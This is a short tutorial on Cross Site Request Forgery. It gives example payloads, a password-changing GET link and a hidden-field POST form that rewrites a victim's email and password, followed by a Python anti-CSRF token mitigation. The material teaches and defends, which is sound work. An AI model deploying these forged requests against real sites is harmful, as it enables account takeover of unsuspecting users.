Cross Site Request Forgery (CSRF)


Overview

CSRF is an attack that forces a victim user to perform unwanted actions like transferring funds, changing password or email.

How it works

It's all about performing an action that we can't do ourselves but our victim has the privilege to do (e.g. changing their own password).

There are several approaches to this attack, but first we need to know how to build a valid malicious request so that we can trick our victim into launching it.

So first we change the password of our own account to Very $ecret and look at the request:

GET /change_password/?new_password=Very%20$ecret HTTP/1.1
Host: website.com

Now we embed the following URL within our malicious website, with the desired password:

<a href="http://website.com/change_password/?new_password=Hacked!!!">Click Me!</a>

Once the victim clicks it, a request is sent that changes their password to the one we chose!

Let's see another example using the POST method.

Let's assume that we want to forge the following request:

POST /profile/edit HTTP/1.1
Host: website.com

email=Hackers_Email@hacker.com&password=Hackers_Password

So we will have to embed the following HTML in our malicious page:

<form action="http://website.com/profile/edit" method="POST">
<input type="hidden" name="email" value="Hackers_Email@hacker.com"/>
<input type="hidden" name="password" value="Hackers_Password"/>
<input type="submit" value="Click ME !"/>
</form>

Once the user clicks it, their email and password are changed to the ones in the request.

Mitigation

Using Anti-CSRF Tokens:

An anti-CSRF token is a random value generated by the server for each client (bound to that client's session). The client must send it back with every state-changing request, and the server must validate it on every such request before acting. It is usually sent as a POST or GET parameter, but it can also be sent in an HTTP header.
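The token scheme described above, as an added example that is not from the original page: a minimal server-side issue/validate pair and a password-change handler that rejects the forged requests shown earlier. The parameter name `csrf_token`, the header name `X-CSRF-Token` and the dict-based session are assumptions for the example.

```python
import hmac
import secrets

TOKEN_FIELD = "csrf_token"     # form/query parameter name (assumed)
TOKEN_HEADER = "X-CSRF-Token"  # HTTP header name (assumed)


def issue_csrf_token(session):
    """Generate a fresh random token and bind it to this user's session.

    The server keeps it in the session and embeds the same value in the
    forms it renders, so only pages served by the site itself know it."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def csrf_token_is_valid(session, params, headers):
    """True only if the request carries the token bound to this session.

    Accepts the token as a POST/GET parameter or as an HTTP header and
    compares in constant time so the check leaks no timing information."""
    expected = session.get("csrf_token")
    submitted = params.get(TOKEN_FIELD) or headers.get(TOKEN_HEADER)
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())


def handle_change_password(session, params, headers):
    """State-changing endpoint: refuse any request without a valid token.

    Returns (status_code, message). A malicious page cannot read the
    victim's token (same-origin policy), so its forged request has none."""
    if not csrf_token_is_valid(session, params, headers):
        return 403, "CSRF token missing or invalid"
    session["password"] = params["new_password"]
    return 200, "password changed"


if __name__ == "__main__":
    # Constructed session for the victim of the earlier examples.
    session = {"user": "victim", "password": "Very $ecret"}
    token = issue_csrf_token(session)
    # Forged request from the attacker's page: right parameter, no token.
    print(handle_change_password(session, {"new_password": "Hacked!!!"}, {}))
    # Legitimate request from the site's own form carries the session token.
    print(handle_change_password(session, {"new_password": "N3w!", TOKEN_FIELD: token}, {}))
```

The same check must cover the GET variant shown earlier; the token is only effective if every state-changing endpoint validates it, whatever HTTP method it accepts.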
